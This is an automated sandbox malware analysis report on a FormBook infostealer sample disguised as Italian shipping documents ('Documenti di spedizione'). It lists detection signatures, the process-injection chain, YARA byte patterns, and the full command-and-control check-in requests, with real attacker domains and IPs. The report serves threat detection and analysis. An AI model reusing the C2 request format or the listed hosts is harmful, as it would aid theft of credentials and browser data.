Windows Analysis Report
AWB_5771388044 Documenti di spedizione.exe

Overview

General Information

Sample name: AWB_5771388044 Documenti di spedizione.exe
Analysis ID: 1515429
MD5: 15fcfde4bcde8e7dce181856e02b1b24
SHA1: 1e87dd4312940e1aa8c3844953a61bc095772418
SHA256: d53e08fc9d3d0153b73b816b38fed23a03f6fa94135ff483e4634d0141c9cbdd
Tags: exe, user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara signature match

Classification

  • System is w10x64
  • AWB_5771388044 Documenti di spedizione.exe (PID: 7264 cmdline: "C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe" MD5: 15FCFDE4BCDE8E7DCE181856E02B1B24)
    • svchost.exe (PID: 7296 cmdline: "C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • pSySrLvnviNdEH.exe (PID: 1904 cmdline: "C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • taskkill.exe (PID: 7676 cmdline: "C:\Windows\SysWOW64\taskkill.exe" MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
          • firefox.exe (PID: 7812 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000001.00000002.2131558880.0000000002E90000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000001.00000002.2131558880.0000000002E90000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2bd50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13f9f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.3591898064.0000000003070000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.3591898064.0000000003070000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2bd50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13f9f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.3591841259.0000000003020000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Source | Rule | Description | Author | Strings
1.2.svchost.exe.4d0000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
1.2.svchost.exe.4d0000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2eff3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17242:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
1.2.svchost.exe.4d0000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
1.2.svchost.exe.4d0000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2e1f3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16442:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe", CommandLine: "C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe", CommandLine|base64offset|contains: ., Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe", ParentImage: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe, ParentProcessId: 7264, ParentProcessName: AWB_5771388044 Documenti di spedizione.exe, ProcessCommandLine: "C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe", ProcessId: 7296, ProcessName: svchost.exe
            Source: Process started, Author: vburov, Data: Command: "C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe", CommandLine: "C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe", CommandLine|base64offset|contains: ., Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe", ParentImage: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe, ParentProcessId: 7264, ParentProcessName: AWB_5771388044 Documenti di spedizione.exe, ProcessCommandLine: "C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe", ProcessId: 7296, ProcessName: svchost.exe
            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-09-22T18:02:25.044941+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49736 | 54.179.173.60 | 80 | TCP
            2024-09-22T18:02:49.600999+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 206.119.82.147 | 80 | TCP
            2024-09-22T18:03:03.365570+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49745 | 81.88.63.46 | 80 | TCP
            2024-09-22T18:03:16.780789+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49749 | 67.223.117.189 | 80 | TCP
            2024-09-22T18:03:30.374979+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49753 | 85.159.66.93 | 80 | TCP
            2024-09-22T18:03:59.827293+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49757 | 208.91.197.27 | 80 | TCP
            2024-09-22T18:04:19.036132+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49761 | 195.161.68.8 | 80 | TCP
            2024-09-22T18:04:32.644463+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49765 | 194.58.112.174 | 80 | TCP

            AV Detection

            Source: tempatmudisini01.click, Virustotal: Detection: 5%
            Source: AWB_5771388044 Documenti di spedizione.exe, ReversingLabs: Detection: 68%
            Source: AWB_5771388044 Documenti di spedizione.exe, Virustotal: Detection: 47%
            Source: Yara match, File source: 1.2.svchost.exe.4d0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 1.2.svchost.exe.4d0000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000001.00000002.2131558880.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000006.00000002.3591898064.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000006.00000002.3591841259.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.3600066837.0000000008F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.3593251845.00000000028D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000006.00000002.3591581349.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000001.00000002.2132078710.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000001.00000002.2131255938.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
            Source: AWB_5771388044 Documenti di spedizione.exe, Joe Sandbox ML: detected
            Source: AWB_5771388044 Documenti di spedizione.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: pSySrLvnviNdEH.exe, 00000005.00000002.3591578337.000000000028E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: AWB_5771388044 Documenti di spedizione.exe, 00000000.00000003.1742877662.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, AWB_5771388044 Documenti di spedizione.exe, 00000000.00000003.1741605002.0000000004880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2033813185.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2131590936.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2031785943.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2131590936.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, 00000006.00000003.2133606313.0000000004E57000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000003.2131496919.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593157085.000000000519E000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593157085.0000000005000000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: AWB_5771388044 Documenti di spedizione.exe, 00000000.00000003.1742877662.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, AWB_5771388044 Documenti di spedizione.exe, 00000000.00000003.1741605002.0000000004880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.2033813185.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2131590936.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2031785943.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2131590936.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, taskkill.exe, 00000006.00000003.2133606313.0000000004E57000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000003.2131496919.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593157085.000000000519E000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593157085.0000000005000000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: taskkill.pdbGCTL source: svchost.exe, 00000001.00000003.2099883367.000000000082C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2099755075.000000000081B000.00000004.00000020.00020000.00000000.sdmp, pSySrLvnviNdEH.exe, 00000005.00000003.2200626845.0000000000C7F000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.0000000006ADC000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.000000000562C000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3591945619.00000000030DB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2417378163.0000000036CBC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.0000000006ADC000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.000000000562C000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3591945619.00000000030DB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2417378163.0000000036CBC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: taskkill.pdb source: svchost.exe, 00000001.00000003.2099883367.000000000082C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2099755075.000000000081B000.00000004.00000020.00020000.00000000.sdmp, pSySrLvnviNdEH.exe, 00000005.00000003.2200626845.0000000000C7F000.00000004.00000001.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe, Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe, Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe, Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe, Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe, Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe, Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe, Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe, Code function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe, Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\taskkill.exe, Code function: 6_2_02B4C360 FindFirstFileW,FindNextFileW,FindClose,6_2_02B4C360
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4x nop then xor esi, esi (1_2_004E83BA)
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe, Code function: 4x nop then xor eax, eax (5_2_08F1EE6C)
            Source: C:\Windows\SysWOW64\taskkill.exe, Code function: 4x nop then xor eax, eax (6_2_02B39AF0)
            Source: C:\Windows\SysWOW64\taskkill.exe, Code function: 4x nop then pop edi (6_2_02B3DF6E)
            Source: C:\Windows\SysWOW64\taskkill.exe, Code function: 4x nop then mov ebx, 00000004h (6_2_04E504DE)

            Networking

            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49753 -> 85.159.66.93:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49741 -> 206.119.82.147:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49757 -> 208.91.197.27:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49749 -> 67.223.117.189:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49745 -> 81.88.63.46:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 54.179.173.60:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49765 -> 194.58.112.174:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49761 -> 195.161.68.8:80
            Source: DNS query: www.uburn.xyz
            Source: Joe Sandbox View, IP Address: 67.223.117.189
            Source: Joe Sandbox View, IP Address: 208.91.197.27
            Source: Joe Sandbox View, ASN Name: VIMRO-AS15189US
            Source: Joe Sandbox View, ASN Name: COGENT-174US
            Source: Joe Sandbox View, ASN Name: CONFLUENCE-NETWORK-INCVG
            Source: Joe Sandbox View, ASN Name: REGISTER-ASIT
            Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe, Code function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
            Source: global traffic, HTTP traffic detected: GET /pk64/?4rl8h=D2L+4j8Jfvzl8MUfQ9khdgsUc3RmXuRTEOKFuX1NYvsOSSQcePjFDW5WJ5RMGSKYSsEK0HwMz36kWpHuw/f75AJHHPht/yIbLRYuc71CiG5Lg6cOqhMe3mM=&CfmHC=h4QXpn780jb HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.tmstore.click | Connection: close | User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
            Source: global traffic, HTTP traffic detected: GET /66vh/?4rl8h=kbtx4jUoEeJqru/eYSGX4Vxi+vYrNV7S+715NBpuIdmHZ1xIlp9jyY2cSJRvQOMSNpijnqr9Yv3PN/2sQDysWmAbAiXLeLXP7wBnaxk7t3LbEP86e95cii4=&CfmHC=h4QXpn780jb HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.wdeb18.top | Connection: close | User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
            Source: global traffic, HTTP traffic detected: GET /znmp/?4rl8h=FLkVAxn7xj4ld/LvMrFB+iyX7UR4Kb9aE0AH2N1ZkKvu5bquFbdTibpxDosPiJzFKWZ1tBPnHLgAGvmlA5vrecd2eGdXAGmup0nokTlXrk0eb8OdUo3hkYI=&CfmHC=h4QXpn780jb HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.2bhp.com | Connection: close | User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
            Source: global traffic, HTTP traffic detected: GET /unks/?4rl8h=cdhJ2J1BF/3FP1t6JbliQByYvepm5n0GJvy2RzMWe/YhGvvDNzkKTft45HunghqbyAFMp5DD9OJS7Rih3uNIOlCSON0kvMqKINfWmh1G6LwRZZAk9zqDBj8=&CfmHC=h4QXpn780jb HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.uburn.xyz | Connection: close | User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
            Source: global traffic, HTTP traffic detected: GET /og3c/?4rl8h=PJMN73v+cS+JEOCp4MHXb74XFyLCcf/8AP5dNED26sKmApKDXWDqmSS3jfO80ER4JfpprrZAuqpt1wLlM7DUug2WU25CtLkRmct6bnS3AqTVtMg1RKgxnn8=&CfmHC=h4QXpn780jb HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.sppsuperplast.online | Connection: close | User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
            Source: global traffic, HTTP traffic detected: GET /c45k/?4rl8h=08ptcl9k6k3Clc+jjfTphEeOe2lz7AEUYr4PirX9ycnlRkqnpIEJhgCFSf5hEjt7uErMgv9wtAp1yqXhXhWRgW+nHLlYanRICP4JCJqgUGT9OLnA1kIzPD4=&CfmHC=h4QXpn780jb HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.palcoconnector.net | Connection: close | User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
            Source: global traffic, HTTP traffic detected: GET /0dae/?CfmHC=h4QXpn780jb&4rl8h=jXNXsyq5R/QDxa7bJ2ljemvTesZ1LTXEaXuC8OrACrNOR23rlYUr+PSW9bwqyvvRK2/UTV39N9+HzvOrg18nL3Fjm+gENjZiKF7fGS3+8e9UoB+RgXgdxF4= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.trapkitten.website | Connection: close | User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
            Source: global traffic, HTTP traffic detected: GET /vyk8/?4rl8h=/8W9lHmy/meYp2fNs3efAdRvbFxf2DuKL4zSfhQhCqnq6Zc+yf7I5zlrSSPwb+CI3DZqbI5vil5mP2MKXHyCXZgHhQsXe7748Z5EYcVgGcHWqsQ0OU2KuuY=&CfmHC=h4QXpn780jb HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.albero-dveri.online | Connection: close | User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
            Source: global traffic, DNS traffic detected: DNS query: www.tmstore.click
            Source: global traffic, DNS traffic detected: DNS query: www.wdeb18.top
            Source: global traffic, DNS traffic detected: DNS query: www.2bhp.com
            Source: global traffic, DNS traffic detected: DNS query: www.uburn.xyz
            Source: global traffic, DNS traffic detected: DNS query: www.sppsuperplast.online
            Source: global traffic, DNS traffic detected: DNS query: www.palcoconnector.net
            Source: global traffic, DNS traffic detected: DNS query: www.trapkitten.website
            Source: global traffic, DNS traffic detected: DNS query: www.albero-dveri.online
            Source: global traffic, DNS traffic detected: DNS query: www.tempatmudisini01.click
            Source: unknown, HTTP traffic detected: POST /66vh/ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Accept-Encoding: gzip, deflate, br | Host: www.wdeb18.top | Content-Type: application/x-www-form-urlencoded | Content-Length: 202 | Connection: close | Cache-Control: no-cache | Origin: http://www.wdeb18.top | Referer: http://www.wdeb18.top/66vh/ | User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 | Data Ascii: 4rl8h=pZFR7XUxJ/cK0+SPfQHpwmZcnOwRPBz4proZcA94HY+pJ2kks79GubirPItAEM80E7PO/ualRvjwEs6vdTuvLEw9AyfOSLbRuQt3X1dygXjDKtoKXJc5mDmBd0Xd6y1OC5+TZDQ1pPrtV8BarrEW4R2pHK2u5mtPPSWz8RMJVs6TKPKoRpshYrPo4jO+Qsw9gg==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 16:02:41 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66aa3fcf-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 16:02:44 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66aa3fcf-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
